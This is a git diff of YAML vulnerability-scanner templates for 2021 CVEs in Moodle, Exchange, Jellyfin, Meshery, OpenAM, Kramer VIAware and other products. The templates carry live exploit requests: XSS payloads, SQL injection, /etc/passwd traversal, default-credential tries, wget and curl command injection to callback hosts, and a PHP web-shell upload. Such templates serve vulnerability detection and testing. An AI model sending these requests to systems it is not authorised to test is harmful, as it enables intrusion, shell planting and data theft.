+ - type: regex
+ part: body_1
+ regex:
+ - "elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"
+
+ extractors:
+ - type: regex
+ name: version
+ group: 1
+ regex:
+ - "elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"
+ internal: true
+
+ - type: kval
+ kval:
+ - version
+# digest: 4a0a00473045022100b1b700b6532302e33f9c282b91d1b67cb96740315c551d6ebc680cc011903d7b02205591616553b2ecff73f2c1dda08659978ac1aef414e995efd1f285d6b02c293b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2021-25864.yaml b/poc/cve/cve-2021-25864.yaml
index 25fbcc58c2..ef5001e046 100644
--- a/poc/cve/cve-2021-25864.yaml
+++ b/poc/cve/cve-2021-25864.yaml
@@ -1,4 +1,5 @@
id: CVE-2021-25864
+
info:
name: Hue Magic - Directory Traversal
author: 0x_Akoko
@@ -12,6 +13,8 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-25864
cwe-id: CWE-22
+ metadata:
+ shodan-query: title:"NODE-RED"
tags: cve,cve2021,huemagic,lfi
requests:
@@ -24,7 +27,7 @@ requests:
- type: regex
regex:
- - "root:[x*]:0:0"
+ - "root:.*:0:0:"
- type: status
status:
diff --git a/poc/cve/cve-2021-26086.yaml b/poc/cve/cve-2021-26086.yaml
index 034fb34e9e..6f562be26f 100644
--- a/poc/cve/cve-2021-26086.yaml
+++ b/poc/cve/cve-2021-26086.yaml
@@ -1,21 +1,19 @@
id: CVE-2021-26086
info:
- name: Atlassian Jira Limited - Local File Inclusion
+ name: Jira Limited Local File Read
author: cocxanh
severity: medium
- description: Affected versions of Atlassian Jira Limited Server and Data Center are vulnerable to local file inclusion because they allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint.
+ description: Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint.
reference:
- https://jira.atlassian.com/browse/JRASERVER-72695
- - http://packetstormsecurity.com/files/164405/Atlassian-Jira-Server-Data-Center-8.4.0-File-Read.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-26086
+ - http://packetstormsecurity.com/files/164405/Atlassian-Jira-Server-Data-Center-8.4.0-File-Read.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2021-26086
cwe-id: CWE-22
- metadata:
- shodan-query: http.component:"Atlassian Jira"
tags: cve,cve2021,jira,lfi
requests:
@@ -35,5 +33,3 @@ requests:
- ""
part: body
condition: and
-
-# Enhanced by mp on 2022/07/22
diff --git a/poc/cve/cve-2021-26812.yaml b/poc/cve/cve-2021-26812.yaml
new file mode 100644
index 0000000000..e5378cec02
--- /dev/null
+++ b/poc/cve/cve-2021-26812.yaml
@@ -0,0 +1,38 @@
+id: CVE-2021-26812
+
+info:
+ name: Moodle jitsi plugin XSS
+ author: aceseven (digisec360)
+ severity: medium
+ description: Cross Site Scripting (XSS) in the Jitsi Meet 2.7 through 2.8.3 plugin for Moodle via the "sessionpriv.php" module. This allows attackers to craft a malicious URL, which when clicked on by users, can
+ inject javascript code to be run by the application.
+ reference:
+ - https://github.com/udima-university/moodle-mod_jitsi/issues/67
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-26812
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-26812
+ cwe-id: CWE-79
+ tags: cve,cve2021,moodle,jitsi,xss,plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "alert(document.domain);"
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "MoodleSession"
diff --git a/poc/cve/cve-2021-26855.yaml b/poc/cve/cve-2021-26855.yaml
new file mode 100644
index 0000000000..ae5e857ac7
--- /dev/null
+++ b/poc/cve/cve-2021-26855.yaml
@@ -0,0 +1,34 @@
+id: CVE-2021-26855
+
+info:
+ name: Microsoft Exchange Server SSRF Vulnerability
+ author: madrobot
+ severity: critical
+ description: This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.
+ reference:
+ - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855
+ - https://proxylogon.com/#timeline
+ - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
+ - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
+ - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
+ remediation: Apply the appropriate security update.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-26855
+ tags: cve,cve2021,ssrf,rce,exchange,oast,microsoft
+
+requests:
+ - raw:
+ - |
+ GET /owa/auth/x.js HTTP/1.1
+ Host: {{Hostname}}
+ Cookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
+
+# Enhanced by mp on 2022/02/04
diff --git a/poc/cve/cve-2021-27651.yaml b/poc/cve/cve-2021-27651.yaml
new file mode 100644
index 0000000000..12c81fa998
--- /dev/null
+++ b/poc/cve/cve-2021-27651.yaml
@@ -0,0 +1,49 @@
+id: CVE-2021-27651
+
+info:
+ name: Pega Infinity - Authentication Bypass
+ author: idealphase
+ severity: critical
+ description: Pega Infinity versions 8.2.1 through 8.5.2 contain an authentication bypass vulnerability because the password reset functionality for local accounts can be used to bypass local authentication checks.
+ reference:
+ - https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-27651
+ - https://collaborate.pega.com/discussion/pega-security-advisory-a21-hotfix-matrix
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-27651
+ cwe-id: CWE-287,CWE-640
+ tags: cve,cve2021,pega,auth-bypass
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/prweb/PRAuth/app/default/"
+
+ cookie-reuse: true
+ redirects: true
+ max-redirects: 2
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "Pega Infinity"
+ part: body
+
+ - type: regex
+ regex:
+ - 'Pega 8\.(?:2\.[1-9]|3\.[0-9]|4\.[0-9]|5\.[0-2])'
+ part: body
+
+ extractors:
+ - type: regex
+ regex:
+ - 'Pega 8\.(?:2\.[1-9]|3\.[0-9]|4\.[0-9]|5\.[0-2])'
+ part: body
+
+# Enhanced by mp on 2022/05/17
diff --git a/poc/cve/cve-2021-27748.yaml b/poc/cve/cve-2021-27748.yaml
new file mode 100644
index 0000000000..471a3628f9
--- /dev/null
+++ b/poc/cve/cve-2021-27748.yaml
@@ -0,0 +1,48 @@
+id: CVE-2021-27748
+
+info:
+ name: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery
+ author: pdteam
+ severity: high
+ description: |
+ IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to bypass security controls, access internal resources, and potentially perform further attacks.
+ remediation: |
+ Apply the latest security patches or updates provided by IBM to mitigate this vulnerability.
+ reference:
+ - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
+ - https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748
+ classification:
+ cve-id: CVE-2021-27748
+ metadata:
+ verified: true
+ max-request: 3
+ shodan-query: http.html:"IBM WebSphere Portal"
+ tags: cve2021,cve,hcl,ibm,ssrf,websphere
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ - '{{BaseURL}}/docpicker/internal_proxy/http/oast.me'
+ - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me'
+
+ host-redirects: true
+ max-redirects: 2
+ stop-at-first-match: true
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Interactsh Server"
+
+ - type: word
+ part: body_1
+ words:
+ - "Interactsh Server"
+ negative: true
+# digest: 490a0046304402200ba3597e1cd51ea49029981ba317f0f962cc8082d2f3796e4d59fc9138bf9d9d0220226c8cb7207a0c85488b5ce96a38f6e0b616ebb9b487135b1fda864f9d6503d2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2021-28150.yaml b/poc/cve/cve-2021-28150.yaml
new file mode 100644
index 0000000000..8c9d76f47e
--- /dev/null
+++ b/poc/cve/cve-2021-28150.yaml
@@ -0,0 +1,46 @@
+id: CVE-2021-28150
+
+info:
+ name: Hongdian Sensitive Information
+ author: gy741
+ severity: medium
+ description: Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi.
+ reference:
+ - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-28150
+ - http://en.hongdian.com/Products/Details/H8922
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 5.5
+ cve-id: CVE-2021-28150
+ cwe-id: CWE-20
+ tags: cve,cve2021,hongdian,exposure
+
+requests:
+ - raw:
+ - |
+ GET /backup2.cgi HTTP/1.1
+ Host: {{Hostname}}
+ Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
+
+ - |
+ GET /backup2.cgi HTTP/1.1
+ Host: {{Hostname}}
+ Authorization: Basic YWRtaW46YWRtaW4=
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "application/octet-stream"
+ part: header
+
+ - type: word
+ words:
+ - "CLI configuration saved from vty"
+ - "service webadmin"
+ part: body
\ No newline at end of file
diff --git a/poc/cve/cve-2021-29490.yaml b/poc/cve/cve-2021-29490.yaml
new file mode 100644
index 0000000000..863badcd39
--- /dev/null
+++ b/poc/cve/cve-2021-29490.yaml
@@ -0,0 +1,31 @@
+id: CVE-2021-29490
+
+info:
+ name: Jellyfin 10.7.2 SSRF
+ author: alph4byt3
+ severity: medium
+ description: Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-29490
+ - https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
+ cvss-score: 5.8
+ cve-id: CVE-2021-29490
+ cwe-id: CWE-918
+ remediation: Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints "/Items/*/RemoteImages/Download", "/Items/RemoteSearch/Image" and "/Images/Remote".
+ tags: cve,cve2021,ssrf,jellyfin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/Images/Remote?imageUrl=http://{{interactsh-url}}"
+ - "{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=http://{{interactsh-url}}&ProviderName=TheMovieDB"
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
+
+# Enhanced by cs on 2022/02/25
diff --git a/poc/cve/cve-2021-29625.yaml b/poc/cve/cve-2021-29625.yaml
new file mode 100644
index 0000000000..70287d1af1
--- /dev/null
+++ b/poc/cve/cve-2021-29625.yaml
@@ -0,0 +1,38 @@
+id: CVE-2021-29625
+
+info:
+ name: Adminer reflected XSS via the table parameter
+ author: daffainfo
+ severity: medium
+ description: Adminer is open-source database management software. A cross-site scripting vulnerability in Adminer versions 4.6.1 to 4.8.0 affects users of MySQL, MariaDB, PgSQL and SQLite. XSS is in most cases prevented by strict CSP in all modern browsers. The only exception is when Adminer is using a `pdo_` extension to communicate with the database (it is used if the native extensions are not enabled). In browsers without CSP, Adminer versions 4.6.1 to 4.8.0 are affected. The vulnerability is patched in version 4.8.1. As workarounds, one can use a browser supporting strict CSP or enable the native PHP extensions (e.g. `mysqli`) or disable displaying PHP errors (`display_errors`).
+ reference:
+ - https://sourceforge.net/p/adminer/bugs-and-features/797/
+ - https://www.cvedetails.com/cve/CVE-2021-29625/
+ - https://github.com/vrana/adminer/commit/4043092ec2c0de2258d60a99d0c5958637d051a7
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-29625
+ cwe-id: CWE-79
+ tags: cve,cve2021,adminer,xss
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2021-30151.yaml b/poc/cve/cve-2021-30151.yaml
new file mode 100644
index 0000000000..4c58103107
--- /dev/null
+++ b/poc/cve/cve-2021-30151.yaml
@@ -0,0 +1,37 @@
+id: CVE-2021-30151
+
+info:
+ name: Sidekiq 5.1.3 and 6.x-6.2.0 - Cross-Site Scripting
+ author: DhiyaneshDk
+ severity: medium
+ description: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used.
+ reference:
+ - https://github.com/mperham/sidekiq/issues/4852
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-30151
+ - https://lists.debian.org/debian-lts-announce/2022/03/msg00015.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-30151
+ cwe-id: CWE-79
+ tags: cve,cve2021,xss,sidekiq
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/sidekiq/queues/"onmouseover="alert(nuclei)"'
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "onmouseover=\"alert('nuclei')"
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2021-30497.yaml b/poc/cve/cve-2021-30497.yaml
index 26399d5eb2..28669446a4 100644
--- a/poc/cve/cve-2021-30497.yaml
+++ b/poc/cve/cve-2021-30497.yaml
@@ -5,8 +5,13 @@ info:
author: gy741
severity: high
description: A directory traversal vulnerability in Ivanti Avalanche allows remote unauthenticated user to access files that reside outside the 'image' folder
- reference: https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/
+ reference:
+ - https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/
+ - https://forums.ivanti.com/s/article/Security-Alert-CVE-2021-30497-Directory-Traversal-Vulnerability?language=en_US
+ - https://help.ivanti.com/wl/help/en_us/aod/5.4/Avalanche/Console/Launching_the_Avalanche.htm
classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
cve-id: CVE-2021-30497
tags: cve,cve2021,avalanche,traversal
diff --git a/poc/cve/cve-2021-31682.yaml b/poc/cve/cve-2021-31682.yaml
index d2564812c7..84cf77c107 100644
--- a/poc/cve/cve-2021-31682.yaml
+++ b/poc/cve/cve-2021-31682.yaml
@@ -4,17 +4,18 @@ info:
name: WebCTRL OEM <= 6.5 Reflected Cross-Site Scripting
author: gy741,dhiyaneshDk
severity: medium
- description: "WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter."
+ description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-31682
- https://github.com/3ndG4me/WebCTRL-OperatorLocale-Parameter-Reflected-XSS
+ - https://www.automatedlogic.com/en/products-services/webctrl-building-automation-system/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2021-31682
cwe-id: CWE-79
metadata:
- shodan-query: 'html:"/_common/lvl5/dologin.jsp"'
+ shodan-query: html:"/_common/lvl5/dologin.jsp"
tags: cve,cve2021,webctrl,xss
requests:
diff --git a/poc/cve/cve-2021-31755.yaml b/poc/cve/cve-2021-31755.yaml
index 62c5ce19ca..2e3d564f16 100644
--- a/poc/cve/cve-2021-31755.yaml
+++ b/poc/cve/cve-2021-31755.yaml
@@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-31755
cwe-id: CWE-787
- tags: cve,cve2021,tenda,rce,oast,router,mirai,kev
+ tags: cve,cve2021,tenda,rce,oast,router,mirai
requests:
- raw:
diff --git a/poc/cve/cve-2021-31856.yaml b/poc/cve/cve-2021-31856.yaml
new file mode 100644
index 0000000000..e087dac85d
--- /dev/null
+++ b/poc/cve/cve-2021-31856.yaml
@@ -0,0 +1,38 @@
+id: CVE-2021-31856
+
+info:
+ name: Layer5 Meshery 0.5.2 - SQL Injection
+ author: princechaddha
+ severity: critical
+ description: Layer5 Meshery 0.5.2 contains a SQL injection vulnerability in the REST API that allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns
+ in models/meshery_pattern_persister.go).
+ reference:
+ - https://github.com/ssst0n3/CVE-2021-31856
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-31856
+ - https://meshery.io
+ - https://github.com/layer5io/meshery/pull/2745
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-31856
+ cwe-id: CWE-89
+ tags: sqli,cve,cve2021
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0"
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "709b38b27304df6257a86a60df742c4c"
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/05/17
diff --git a/poc/cve/cve-2021-32820.yaml b/poc/cve/cve-2021-32820.yaml
new file mode 100644
index 0000000000..0bed29da10
--- /dev/null
+++ b/poc/cve/cve-2021-32820.yaml
@@ -0,0 +1,36 @@
+id: CVE-2021-32820
+
+info:
+ name: Express-handlebars Path Traversal
+ author: dhiyaneshDk
+ severity: high
+ description: Express-handlebars is a Handlebars view engine for Express. Express-handlebars mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extensions (i.e., file.extension) can be included. Files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability.
+ reference:
+ - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/
+ - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
+ - https://github.com/express-handlebars/express-handlebars/pull/163
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.6
+ cve-id: CVE-2021-32820
+ cwe-id: CWE-200
+ tags: cve,cve2021,expressjs,lfi,xxe
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?layout=/etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - "daemon:[x*]:0:0:"
+ - "operator:[x*]:0:0:"
+ part: body
+ condition: or
diff --git a/poc/cve/cve-2021-33544.yaml b/poc/cve/cve-2021-33544.yaml
new file mode 100644
index 0000000000..f11afe8e8c
--- /dev/null
+++ b/poc/cve/cve-2021-33544.yaml
@@ -0,0 +1,30 @@
+id: CVE-2021-33544
+
+info:
+ name: Geutebruck RCE
+ author: gy741
+ severity: high
+ description: Multiple vulnerabilities in the web-based management interface of Geutebruck could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
+ reference:
+ - https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/
+ - https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/
+ - https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.2
+ cve-id: CVE-2021-33544
+ cwe-id: CWE-77
+ tags: cve,cve2021,geutebruck,rce,oast
+
+requests:
+ - raw:
+ - |
+ GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1
+ Host: {{Hostname}}
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
diff --git a/poc/cve/cve-2021-35265.yaml b/poc/cve/cve-2021-35265.yaml
index 691710c75c..4acd2368ef 100644
--- a/poc/cve/cve-2021-35265.yaml
+++ b/poc/cve/cve-2021-35265.yaml
@@ -8,9 +8,10 @@ info:
reference:
- https://github.com/maxsite/cms/issues/414#issue-726249183
- https://nvd.nist.gov/vuln/detail/CVE-2021-35265
+ - https://github.com/maxsite/cms/commit/6b0ab1de9f3d471485d1347e800a9ce43fedbf1a
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2021-35265
cwe-id: CWE-79
tags: cve,cve2021,maxsite,xss
diff --git a/poc/cve/cve-2021-35464.yaml b/poc/cve/cve-2021-35464.yaml
new file mode 100644
index 0000000000..f71ba6c55b
--- /dev/null
+++ b/poc/cve/cve-2021-35464.yaml
@@ -0,0 +1,50 @@
+id: CVE-2021-35464
+
+info:
+ name: ForgeRock OpenAM <7.0 - Remote Code Execution
+ author: madrobot
+ severity: critical
+ description: |
+ ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages.
+ The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted
+ /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO)
+ found in versions of Java 8 or earlier.
+ reference:
+ - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35464
+ - http://packetstormsecurity.com/files/163486/ForgeRock-OpenAM-Jato-Java-Deserialization.html
+ - http://packetstormsecurity.com/files/163525/ForgeRock-Access-Manager-OpenAM-14.6.3-Remote-Code-Execution.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-35464
+ cwe-id: CWE-502
+ tags: cve,cve2021,openam,rce,java
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/openam/oauth2/..;/ccversion/Version'
+
+ # '{{BaseURL}}/openam/oauth2/..;/ccversion/Version?jato.pageSession='
+ # java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Click1 "curl http://YOUR_HOST" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '='
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "Set-Cookie: JSESSIONID="
+ part: header
+
+ - type: word
+ words:
+ - "Version Information -"
+ - "openam/ccversion/Masthead.jsp"
+ part: body
+ condition: or
+
+# Enhanced by mp on 2022/05/02
diff --git a/poc/cve/cve-2021-36356.yaml b/poc/cve/cve-2021-36356.yaml
new file mode 100644
index 0000000000..8dbb5f01fd
--- /dev/null
+++ b/poc/cve/cve-2021-36356.yaml
@@ -0,0 +1,55 @@
+id: CVE-2021-36356
+
+info:
+ name: Kramer VIAware - Remote Code Execution
+ author: gy741
+ severity: critical
+ description: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames.
+ remediation: |
+ Apply the latest firmware update provided by Kramer to fix the vulnerability and ensure proper input validation in the web interface.
+ reference:
+ - https://www.exploit-db.com/exploits/50856
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-36356
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-35064
+ - https://write-up.github.io/kramerav/
+ - https://github.com/ARPSyndicate/cvemon
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-36356
+ cwe-id: CWE-434
+ epss-score: 0.90558
+ epss-percentile: 0.98752
+ cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 2
+ vendor: kramerav
+ product: viaware
+ tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav
+variables:
+ useragent: "{{rand_base(6)}}"
+
+http:
+ - raw:
+ - |
+ POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php
+ - |
+ GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute("curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'")}' HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - http
+
+ - type: word
+ part: interactsh_request
+ words:
+ - "User-Agent: {{useragent}}"
+# digest: 490a0046304402207d315039be7b2374857658abe5c9080339493506959d103b741bd2b02930cb020220187d49b26985f25c39c9ba0317f1b0bf0540895f0ee8e3b35b33f10f2b8e4c86:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2021-38702.yaml b/poc/cve/cve-2021-38702.yaml
index 3f60770f60..4c1fde131c 100644
--- a/poc/cve/cve-2021-38702.yaml
+++ b/poc/cve/cve-2021-38702.yaml
@@ -4,13 +4,14 @@ info:
name: Cyberoam NetGenie Cross-Site Scripting
author: geeknik
severity: medium
- description: "Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 are susceptible to reflected cross-site scripting via the 'u' parameter of ft.php."
+ description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 are susceptible to reflected cross-site scripting via the 'u' parameter of ft.php.
reference:
- https://seclists.org/fulldisclosure/2021/Aug/20
- https://nvd.nist.gov/vuln/detail/CVE-2021-38702
+ - http://www.cyberoamworks.com/NetGenie-Home.asp
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2021-38702
cwe-id: CWE-79
tags: cve,cve2021,cyberoam,netgenie,xss,router
diff --git a/poc/cve/cve-2021-38704.yaml b/poc/cve/cve-2021-38704.yaml
index 55e5fed1c9..cfe5058168 100644
--- a/poc/cve/cve-2021-38704.yaml
+++ b/poc/cve/cve-2021-38704.yaml
@@ -8,13 +8,14 @@ info:
reference:
- https://github.com/sudonoodle/CVE-2021-38704
- https://nvd.nist.gov/vuln/detail/CVE-2021-38704
- metadata:
- shodan-query: http.title:"ClinicCases",html:"/cliniccases/"
+ - https://github.com/judsonmitchell/ClinicCases/releases
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2021-38704
cwe-id: CWE-79
+ metadata:
+ shodan-query: http.title:"ClinicCases",html:"/cliniccases/"
